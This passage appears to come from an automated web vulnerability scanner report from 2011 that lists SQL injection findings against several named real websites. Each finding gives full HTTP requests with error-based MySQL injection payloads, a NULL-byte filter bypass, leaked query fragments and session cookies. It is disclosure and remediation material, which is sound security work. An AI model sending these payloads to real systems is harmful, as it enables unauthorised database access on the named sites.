,concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27'' HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4888
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.18. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&1'=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5103
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
cat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(se' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&1''=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4928
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.19. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2/1'B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5103
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
cat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))%2/1'B'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''B'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+' at line 5

1.20. http://www.nutter.com/careers.php [CareerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The CareerID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CareerID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&CareerID=17'&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:09:14 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 15946

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>
...[SNIP]...

1.21. http://www.nutter.com/careers.php [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The CategoryID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CategoryID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))'&CareerID=17&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:08:37 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 15841

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<br />
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1 | 1064<BR>
...[SNIP]...

1.22. http://www.soundingsonline.com/archives/'+NSFTW+' [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives/'+NSFTW+''?ordering=&searchphrase=all HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:19:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 19:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?ordering=&searchphrase=all' AND cookie_info=''' at line 1</font>
...[SNIP]...

1.23. http://www.soundingsonline.com/archives/'+NSFTW+' [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives/'+NSFTW+'?ordering=&searchphrase=all&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:17:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 19:17:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

1.24. http://www.soundingsonline.com/archives/'+NSFTW+' [ordering parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The ordering parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the ordering parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives/'+NSFTW+'?ordering='&searchphrase=all HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:13:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 19:13:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

1.25. http://www.soundingsonline.com/archives/'+NSFTW+' [searchphrase parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The searchphrase parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the searchphrase parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives/'+NSFTW+'?ordering=&searchphrase=all' HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:15:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 19:15:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''?ordering=&searchphrase=all'' AND cookie_info=''' at line 1</font>
...[SNIP]...

1.26. https://www.supermedia.com/help/direct-mail [trafficSource cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.supermedia.com
Path:   /help/direct-mail

Issue detail

The trafficSource cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the trafficSource cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /help/direct-mail HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default%00'; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083842|check#true#1301082042; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:39:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 26678


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Ddirect Mail</title>


<link type="text/css" rel="st
...[SNIP]...
e, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=ac3d5"-alert(1)-"2bfe3cee0a";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="No such flow definition with id '(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /help/direct-mail HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default%00''; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083842|check#true#1301082042; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:39:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 25146


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Ddirect Mail</title>


<link type="text/css" rel="st
...[SNIP]...

1.27. http://www.vcahospitals.com/tools/markers_sema.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /tools/markers_sema.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /tools/markers_sema.php?sema='+OR+'ns'%3/1'd'ns HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 198
Content-Type: text/html

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''d'ns' AND i_emergency_only <> 1
   ORDER BY distance' at line 24

1.28. http://www.vcahospitals.com/tools/markers_sema.php [sema parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /tools/markers_sema.php

Issue detail

The sema parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sema parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /tools/markers_sema.php?sema='+OR+'ns'%3d'ns' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:14:01 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 197
Content-Type: text/html

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ns'' AND i_emergency_only <> 1
   ORDER BY distance' at line 24

Request 2

GET /tools/markers_sema.php?sema='+OR+'ns'%3d'ns'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
